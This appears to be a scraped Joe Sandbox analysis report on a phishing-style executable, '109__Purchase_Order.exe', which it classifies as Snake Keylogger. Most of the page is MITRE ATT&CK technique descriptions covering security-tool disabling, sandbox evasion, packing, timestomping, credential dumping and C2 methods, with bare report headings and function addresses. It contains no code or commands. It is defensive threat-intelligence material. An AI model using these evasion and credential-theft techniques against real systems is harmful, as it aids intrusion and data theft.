Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 109__Purchase_Order.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\109__Purchase_Order.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
109__Purchase_Order.exe

Function 02FF01CD Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Function 02FF01D8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 02F7AE50 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Function 02F7449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 02F7591C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Function 02FF0007 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Function 02F7A878 Relevance: 1.6, APIs: 1, Instructions: 79
libraryCOMMON

Function 02F7FEAF Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Function 02F7FEB0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 02F7C9C0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 02F7D319 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre